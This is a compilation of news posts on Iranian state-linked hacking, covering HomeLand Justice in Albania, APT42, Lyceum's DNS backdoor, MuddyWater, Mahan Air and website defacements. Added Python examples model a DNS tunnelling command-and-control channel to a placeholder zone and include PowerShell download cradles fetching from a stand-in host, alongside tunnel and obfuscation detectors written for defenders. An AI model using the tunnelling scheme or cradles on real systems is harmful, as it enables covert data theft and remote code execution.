
Albanian President Holds Meeting with NSC Over Iran Cyber Attacks Led by HomeLand Justice


In the wake of ongoing cyber attacks by the hacker group HomeLand Justice, Albanian President Bajram Begaj convened the National Security Council (NSC) in the capital, Tirana, on Monday, 10 October. The meeting, attended by senior government officials, was held to discuss the persistent cyberattacks against state infrastructure that Albania attributes to Iran.

The meeting was attended by Albanian Prime Minister Edi Rama, Prosecutor General Olsjan Çela, Director General of Police Muhamet Rrumbullaku, Chairman of the Security Commission Nasip Naço, and senior intelligence officials. 

HomeLand Justice is a persona operated by Iranian state-sponsored advanced persistent threat (APT) actors. The attackers attempted to paralyse public services, steal and wipe government data, and disrupt government websites and online services.

Earlier this year, in July, HomeLand Justice took to social media to publicise the leaks, addressing the Albanian government directly and posting polls in which followers chose which of the stolen data should be published next.

Albania publicly attributed the July attack to Iran and severed diplomatic ties with Tehran in September; a second attack against Albanian government systems followed shortly afterwards, possibly in retaliation for the attribution.

Over the weekend, the threat actors published data pertaining to employees of the State Police on the Telegram channel operated by HomeLand Justice. The leaked records included names, ID numbers, ages, photographs and other personal details.

Although little has been disclosed about the two-hour meeting, Finance Minister Delina Ibrahimaj commented on it at an unrelated press conference.

“In fact, it is the role of the president to call the national security committee on various issues. We discussed the current issues of cyber attacks. Each institution reported on the measures taken, on the level of impact and on the measures that will be taken in the future to cope with the situation,” Ibrahimaj said.

The National Security Council was last convened on 14 February 2022 by former president Ilir Meta, in regard to the Russia-Ukraine tensions.

Iranian APT42 Launched Over 30 Espionage Attacks Across 14 Nations


Cybersecurity firm Mandiant has attributed more than 30 cyber espionage operations against activists and dissidents to the state-backed Iranian threat group APT42 (formerly tracked as UNC788), with activity dating back to at least 2015.

Based on APT42’s targeting and tooling, the researchers assess that the group operates on behalf of the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO) and that it partially overlaps with another Iran-linked APT group tracked as APT35 (aka Charming Kitten, Phosphorus, Newscaster, and Ajax Security Team).

The group has targeted multiple sectors, including non-profits, education, government, healthcare, legal, manufacturing, media and pharmaceuticals, across 14 countries, among them Australia and the U.S. as well as countries in Europe and the Middle East.

“APT42 activity poses a threat to foreign policy officials, commentators, and journalists, particularly those in the US, the UK, and Israel, working on Iran-related projects,” reads the report published by Mandiant. “Additionally, the group’s surveillance activity highlights the real-world risk to individual targets of APT42 operations, which include Iranian dual-nationals, former government officials, and dissidents both inside Iran and those who previously left the country, often out of fear for their personal safety.”

The group focuses primarily on cyber espionage, using highly targeted spear-phishing and social engineering to gain access to personal and corporate email accounts, or to deploy Android malware on mobile devices.

APT42 is also able to capture two-factor authentication codes, defeating otherwise stronger authentication, and sometimes uses the resulting access to target the employers, colleagues and relatives of the initial victim. While credential theft is its preferred approach, the group has also deployed several custom backdoors and lightweight tools against its targets.

In September last year, the group compromised a European government email account and used it to send a phishing email to nearly 150 addresses associated with individuals or entities employed by or linked to civil society, government or intergovernmental organizations around the world. The phishing email contained a Google Drive link to a malicious macro document that led to TAMECAT, a PowerShell toehold backdoor.

The researchers also found multiple similarities in “intrusion activity clusters” between APT42 and another Iran-linked group, UNC2448, which has previously been observed scanning for vulnerabilities and abusing BitLocker to deploy ransomware.

“While Mandiant has not observed technical overlaps between APT42 and UNC2448, the latter may also have ties to the IRGC-IO,” Mandiant explained. “We assess with moderate confidence that UNC2448 and the Revengers Telegram persona are operated by at least two Iranian front companies, Najee Technology and Afkar System, based on open-source information and operational security lapses by the threat actors.”

Iranian Attackers are Employing a New DNS Hijacking Malware to Target Organizations


The Iran-linked Lyceum cyber espionage group, also known as Hexane or Spirlin, is using a new .NET-based DNS backdoor to target organizations in the energy and telecommunications sectors.

Lyceum has previously targeted communication service providers in the Middle East using DNS-tunneling backdoors.

According to Zscaler ThreatLabz researchers, the backdoor is built on the open-source DIG.net DNS library and is used to carry out “DNS hijacking” (manipulating DNS responses so that victims are redirected to attacker-controlled clones of legitimate sites), execute commands, drop payloads and exfiltrate data.

Delivered via a Word document

The hackers target organizations with macro-laced Microsoft Word documents downloaded from a domain named "news-spot[.]live", which poses as a legitimate news site. The document is disguised as a news report on Iranian military affairs.

When a victim opens the downloaded file, it asks them to enable macros in order to view the content. Once macros are enabled, the DNS backdoor, DnsSystem.exe, is dropped directly into the Startup folder so that it runs again after every reboot.

"The threat actors have customized and appended code that allows them to perform DNS queries for various records onto the custom DNS Server, parse the response of the query to execute system commands remotely, and upload/download files from the Command & Control server by leveraging the DNS protocol," Zscaler researchers Niraj Shivtarkar and Avinash Kumar explained in a report published last week.

At start-up, the malware resolves the IP address of the attacker-controlled domain "cyberclub[.]one" and uses it as its DNS server, and it generates an MD5 hash of the victim's username to serve as a unique victim ID. The backdoor can then upload and download arbitrary files to and from the remote server and execute system commands on the compromised host, all carried over DNS.
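To make the mechanism concrete, here is a small model of such a channel, written for this page as an added example; it is not Lyceum's code and is not derived from the Zscaler analysis beyond what the paragraph above states. It assumes an attacker zone c2.example.invalid (standing in for cyberclub[.]one), a made-up query-name layout and fixed chunk sizes, and it returns the tasking string instead of executing anything:

```python
"""Toy model of both directions of a DNS-based command-and-control channel.

Added example for this page; not Lyceum's code. The zone name, the record
layout and the chunk sizes are assumptions chosen to illustrate the technique.
"""
import hashlib
from typing import Dict, List

BASE_DOMAIN = "c2.example.invalid"   # assumed attacker zone (stands in for cyberclub[.]one)
HEX_PER_LABEL = 60                   # 30 bytes per label, under the 63-octet label limit
LABELS_PER_QUERY = 3                 # keeps every query name well under 253 octets


def victim_id(username: str) -> str:
    """Per-host identifier: MD5 of the local username, as the report describes."""
    return hashlib.md5(username.encode("utf-8")).hexdigest()


def encode_upload(vid: str, data: bytes) -> List[str]:
    """Client -> server: pack arbitrary bytes into query names of the form
    <seq>.<hex>.<hex>.<hex>.<vid>.<BASE_DOMAIN>. Each name is one DNS query,
    so a resolver log shows one long, high-entropy subdomain per chunk."""
    hexdata = data.hex()
    per_query = HEX_PER_LABEL * LABELS_PER_QUERY
    names = []
    for seq, start in enumerate(range(0, len(hexdata), per_query)):
        chunk = hexdata[start:start + per_query]
        labels = [chunk[i:i + HEX_PER_LABEL] for i in range(0, len(chunk), HEX_PER_LABEL)]
        names.append(".".join([str(seq), *labels, vid, BASE_DOMAIN]))
    return names


def decode_upload(query_names: List[str]) -> Dict[str, bytes]:
    """Server side: ignore unrelated names, group by victim ID, reorder by
    sequence number (UDP may deliver out of order) and reassemble the bytes."""
    suffix = "." + BASE_DOMAIN
    parts: Dict[str, Dict[int, str]] = {}
    for name in query_names:
        if not name.endswith(suffix):
            continue                              # ordinary traffic, not ours
        labels = name[:-len(suffix)].split(".")
        if len(labels) < 3 or not labels[0].isdigit():
            continue                              # a beacon or malformed name, not a data chunk
        seq, *chunks, vid = labels
        parts.setdefault(vid, {})[int(seq)] = "".join(chunks)
    return {vid: bytes.fromhex("".join(c[k] for k in sorted(c))) for vid, c in parts.items()}


def beacon_name(vid: str) -> str:
    """Client -> server: an empty check-in, answered with the next task."""
    return f"{vid}.{BASE_DOMAIN}"


def answer_beacon(query_name: str, tasks: Dict[str, List[str]]) -> str:
    """Server side: the TXT record data returned for a beacon. The command
    rides in the answer; a real implant would hand it to a shell, here it is
    only returned. Unknown victims get 'noop', unrelated names get nothing."""
    suffix = "." + BASE_DOMAIN
    if not query_name.endswith(suffix):
        return ""
    queue = tasks.get(query_name[:-len(suffix)], [])
    return queue.pop(0) if queue else "noop"


if __name__ == "__main__":
    vid = victim_id("alice")
    for n in encode_upload(vid, b"constructed sample output of a command" * 4):
        print(n)                                  # what the resolver log would record
    print(answer_beacon(beacon_name(vid), {vid: ["whoami"]}))
```

The point for defenders is visible in the output: every upload produces a burst of unique, long, hex-looking subdomains under one zone, and the beacon is a bare, repeated TXT lookup for a 32-character label. Those are the properties detection logic keys on.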

Evolution of Lyceum

The Lyceum APT group was first observed in early August 2019, attempting to gain access to target organizations' systems via password spraying and brute-force attacks.

Lyceum focuses primarily on cyber espionage, and this new, stealthier backdoor shows how its tooling has evolved. The group is expected to keep taking part in data theft campaigns that often involve several Iranian hacking groups.

"APT threat actors are continuously evolving their tactics and malware to successfully carry out attacks against their targets," the researchers stated. "Attackers continuously embrace new anti-analysis tricks to evade security solutions; re-packaging of malware makes the static analysis even more challenging."

U.S. Cyber Command Officially Links MuddyWater Gang to Iranian Intelligence


The US military's Cyber Command on Wednesday officially tied the Iranian-backed MuddyWater hacking group to Iran's Ministry of Intelligence and Security (MOIS).

According to Cyber Command, the group was first identified in 2017 and is a subordinate element within MOIS, which conducts domestic surveillance and also targets a wide spectrum of entities in the government, academic, cryptocurrency, telecommunications and oil sectors across the Middle East.

"MuddyWater is an Iranian threat group; previously, the industry has reported that MuddyWater has primarily targeted Middle Eastern nations, and has also targeted European and North American nations," Cyber Command said in a statement.

On Twitter, Cyber Command said the malicious group was employing a suite of malware for espionage and malicious activity. "MOIS hacker group MuddyWater is using open-source code for malware," it said. "MuddyWater and other Iranian MOIS APTs are using DNS tunneling to communicate to its C2 infrastructure; if you see this on your network, look for suspicious outbound traffic."
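Both the Lyceum post above and Cyber Command's advice here come down to the same question for a defender: what does DNS tunneling look like in resolver logs? The detector below is an added example (not Cyber Command's, Zscaler's or any vendor's tooling) run over a constructed, BIND-style query log. The log format, the "last two labels" domain grouping and the thresholds are assumptions to be tuned against your own baseline:

```python
"""Flag DNS-tunnelled C2 in resolver query logs.

Added example for this page; not Cyber Command's or any vendor's tooling.
The log lines are constructed, and the thresholds are starting points.
"""
import hashlib
import math
import re
from collections import Counter, defaultdict
from typing import Dict, List

# Constructed BIND-style line: <timestamp> <client> query: <name> IN <qtype>
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) query: (?P<name>\S+) IN (?P<qtype>[A-Z]+)$")
RARE_QTYPES = {"TXT", "NULL", "CNAME"}   # record types tunnels favour for large answers


def registered_domain(name: str) -> str:
    """Naive 'last two labels' grouping; production code should use the Public Suffix List."""
    labels = name.rstrip(".").split(".")
    return ".".join(labels[-2:])


def shannon_entropy(s: str) -> float:
    """Bits per character; hex-encoded data sits near 4.0, English words near 3.0 or less."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def score_domains(lines: List[str]) -> Dict[str, Dict[str, float]]:
    """Aggregate per registered domain: query count, distinct subdomains,
    mean subdomain length, mean entropy and the share of rare record types."""
    acc = defaultdict(lambda: {"n": 0, "subs": set(), "len": 0, "ent": 0.0, "rare": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                          # unparsable line: skip, do not crash the pipeline
        name = m["name"].rstrip(".")
        dom = registered_domain(name)
        sub = name[:-len(dom)].rstrip(".")    # everything left of the registered domain
        st = acc[dom]
        st["n"] += 1
        st["subs"].add(sub)
        st["len"] += len(sub)
        st["ent"] += shannon_entropy(sub.replace(".", ""))
        st["rare"] += int(m["qtype"] in RARE_QTYPES)
    return {
        dom: {
            "queries": st["n"],
            "unique_subdomains": len(st["subs"]),
            "avg_subdomain_len": st["len"] / st["n"],
            "avg_entropy": st["ent"] / st["n"],
            "rare_qtype_ratio": st["rare"] / st["n"],
        }
        for dom, st in acc.items()
    }


def flag_tunnels(stats: Dict[str, Dict[str, float]],
                 min_unique: int = 20, min_len: int = 40, min_entropy: float = 3.5) -> List[str]:
    """Domains with many distinct, long, high-entropy subdomains: the signature
    of data being carried in the query names themselves."""
    return sorted(
        dom for dom, s in stats.items()
        if s["unique_subdomains"] >= min_unique
        and s["avg_subdomain_len"] >= min_len
        and s["avg_entropy"] >= min_entropy
    )


# --- constructed sample log (not real traffic) ---
BENIGN_LINES = [
    "2022-01-12T10:00:01Z 10.0.0.5 query: www.example.com IN A",
    "2022-01-12T10:00:02Z 10.0.0.5 query: mail.example.com IN MX",
    "2022-01-12T10:00:03Z 10.0.0.7 query: cdn.static.example.net IN AAAA",
    "2022-01-12T10:00:04Z 10.0.0.7 query: www.example.com IN A",
]


def tunnel_lines(n: int = 40) -> List[str]:
    """Synthesise n queries shaped like hex-encoded chunks to one attacker zone;
    sha256 of a counter stands in for the exfiltrated bytes."""
    out = []
    for i in range(n):
        h = hashlib.sha256(str(i).encode()).hexdigest()
        out.append(f"2022-01-12T10:01:{i % 60:02d}Z 10.0.0.9 query: "
                   f"{i}.{h[:32]}.{h[32:]}.c2.example.invalid IN TXT")
    return out


SAMPLE_LOG = BENIGN_LINES + tunnel_lines()

if __name__ == "__main__":
    print(flag_tunnels(score_domains(SAMPLE_LOG)))
```

Run against a day of real resolver logs, the interesting output is the tail: a handful of zones with hundreds of unique subdomains and near-maximal entropy. Whitelist the legitimate offenders (CDNs, anti-virus reputation lookups, some telemetry) rather than raising the thresholds, or the tunnels hide behind them.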

In partnership with the FBI, USCYBERCOM's Cyber National Mission Force (CNMF) has also shared multiple samples of PowGoop, a DLL loader designed to decrypt and run a PowerShell-based malware downloader. Five of the files that CNMF uploaded to VirusTotal this week were not flagged as malicious by any of the antivirus engines in the scanning service, while six others had very low detection rates.

"If you see a combination of these tools, Iranian MOIS actor MuddyWater may be in your network. MuddyWater has been seen using a variety of techniques to maintain access to victim networks," the US military command added. "These include side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions."
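The "obfuscating PowerShell scripts" point is one a defender can act on directly from process-creation logs. The triage helper below is an added example, not USCYBERCOM's or any vendor's detection logic: it decodes an -EncodedCommand argument (Base64 of UTF-16LE text, which is what powershell.exe expects) and counts common obfuscation and download-cradle indicators. The command lines it scans are constructed for this page, the host c2.example.invalid is made up, and the indicator list is a starting point rather than a complete signature set:

```python
"""Triage PowerShell command lines for -EncodedCommand and obfuscation tell-tales.

Added example for this page; not USCYBERCOM's or any vendor's logic.
"""
import base64
import re
from typing import Dict, List, Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)

INDICATORS = [
    ("invoke-expression",          re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("download cradle",            re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)),
    ("base64 decode in script",    re.compile(r"frombase64string", re.I)),
    ("hidden / noprofile / bypass", re.compile(r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?\b|ep\s+bypass|executionpolicy\s+bypass)", re.I)),
    ("backtick insertion",         re.compile(r"[A-Za-z]`[A-Za-z]")),
    ("char-code construction",     re.compile(r"\[char\]\s*\d+|\[char\[\]\]", re.I)),
    ("string concat / format",     re.compile(r"'\s*\+\s*'|-join\b|\)\s*-f\s", re.I)),
    ("reflective assembly load",   re.compile(r"\[reflection\.assembly\]::load", re.I)),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None                      # not valid Base64/UTF-16LE: treat as not encoded


def normalize(text: str) -> str:
    """Undo the cheapest obfuscation for matching only: backticks inside tokens
    (I`E`X) and case. Genuine escapes such as `n are lost, acceptable for triage."""
    return text.replace("`", "").lower()


def triage(cmdline: str) -> Dict[str, object]:
    """Decode, then match indicators against both the raw text (so backtick
    insertion is still visible) and the normalized text (so keywords resurface)."""
    decoded = decode_encoded_command(cmdline)
    raw = cmdline + ("\n" + decoded if decoded else "")
    haystack = raw + "\n" + normalize(raw)
    hits: List[str] = ["encodedcommand"] if decoded else []
    hits += [name for name, rx in INDICATORS if rx.search(haystack)]
    return {"decoded": decoded, "indicators": hits, "score": len(hits)}


# --- constructed sample command lines (not from any real incident) ---
def _encoded(script: str) -> str:
    """What an attacker's launcher passes to -enc; used only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


CRADLE = 'IEX (New-Object Net.WebClient).DownloadString("http://c2.example.invalid/a")'

SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -enc " + _encoded(CRADLE),
    "powershell.exe -c \"$a='Dow'+'nloadStr'+'ing'; (New-Object Net.WebClient).$a('http://c2.example.invalid/b') | I`E`X\"",
    "powershell.exe -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(triage(line)["score"], triage(line)["indicators"])
```

The second sample is the instructive one: no keyword survives in the raw command line, yet the concatenated string, the Net.WebClient cradle and the backtick-split cmdlet each score on their own, and normalization brings IEX back. Score on combinations, as the Cyber Command statement suggests, rather than on any single indicator.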

In November last year, cyber authorities in the US, UK and Australia attributed attacks exploiting vulnerabilities in Fortinet devices and Microsoft Exchange servers to Iranian-backed actors. Rather than targeting a particular sector of the economy, the attackers exploited the vulnerabilities wherever they could; having gained access, they then attempted to turn it into data exfiltration, a ransomware attack, or extortion.

Iran's Mahan Airline Targeted in Cyber Attack


A cyber attack against Iran's second-largest airline, Mahan Air, has been thwarted, Iranian media reported on Sunday, adding that the airline's flight schedule was not affected.

"Mahan Air's computer system has suffered a new attack. It has already been the target on several occasions due to its important position in the country's aviation industry. Our internet security team is thwarting the cyberattack," airline spokesman Amir-Hossein Zolanvari told state television. 

According to the Daily Sabah, following the attack the airline's website was unreachable for hours, showing an error message that the site could not be reached. Many Mahan Air customers across Iran also received unusual text messages from a group calling itself Hoosyarane-Vatan, which claimed responsibility for the attack.

“We believe the public deserves to know the truth behind this cooperation and the money wasted on IRGC activities abroad while Iranian people suffer at home,” the hacking group said in a statement on the Telegram messaging app. 

As an Iranian airline, Mahan Air has often found itself at the centre of political storms. The carrier has been under US sanctions since 2011 for allegedly providing support to the Quds Force, and has been linked to alleged shipments of arms from Iran to Shiite groups in Syria, including Hezbollah. Israeli airstrikes in Syria have in the past been reported to target Mahan Air weapons shipments.

“Mahan Air has transported IRGC-QF operatives, weapons, equipment, and funds abroad in support of the IRGC-QF’s regional operations, and has also moved weapons and personnel for Hezbollah,” US Treasury stated in 2019. 

Last month, Iran accused Israel and the United States of a cyberattack on its fuel distribution system that caused chaos at petrol stations nationwide. Iranian President Ebrahim Raisi blamed the attack on anti-Iranian forces seeking to sow disorder and disruption across the country.

Days later, the Iran-linked Black Shadow hacking group attacked Israeli internet infrastructure, including the country's largest LGBTQ dating site and an insurance firm. In July, the website of Iran's transport ministry was taken down by what state media described as a "cyber disruption", which also caused delays to train services.

Iranian Hackers Attacked Websites of an African Bank and US Federal Library


According to Iran Briefing, hackers claiming to be Iranian defaced the websites of the Sierra Leone Commercial Bank and the United States Federal Depository Library Program, posting pro-Iranian messages and graphics.

In Google search results, the Sierra Leone Commercial Bank's website appeared with the title "H4ck3D IRANIAN HACKER".

Screenshots posted on Twitter showed the words "hacked by Iranian hacker, hacked by shield Iran" over a drawing of former IRGC Quds Force commander Qasem Soleimani, who was killed in a US airstrike.

According to CBC News, the library program's website was replaced with a bloodied image of US President Donald Trump being punched in the face, along with a message in Farsi and English that read "martyrdom was Soleimani's... reward for years of implacable efforts," and a further caption reading "this is only a small part of Iran's cyber ability!"

A spokesperson for the US Department of Homeland Security's Cybersecurity and Infrastructure Security Agency confirmed the incident, but stopped short of attributing the defacement to Iranian state-sponsored actors.

The spokesperson stated, “We are aware the website of the Federal Depository Library Program [FDLP] was defaced with pro-Iranian, anti-US messaging.”

“At this time, there is no confirmation that this was the action of Iranian state-sponsored actors”. 

The website was taken offline and is no longer accessible. In coordination with the FDLP and other government partners, the Cybersecurity and Infrastructure Security Agency (CISA) is monitoring the situation.

According to another senior US official, the defacement was a minor incident carried out by Iranian sympathizers. Former US Secretary of State Mike Pompeo indicated at the time that a cyberattack by Iran against the US was a possible form of retaliation.

It is unclear whether the hackers were affiliated with the Iranian government or had any connection to Iran at all. The hack came at a time of high tension between the US and Iran following the assassination of Qasem Soleimani, the chief of Iran's Revolutionary Guards Corps Quds Force, in a US strike in Baghdad on Jan. 2.

Iran has already threatened retaliation for the assassination, implying that US assets and interests in the Middle East, as well as US allies, may be targeted.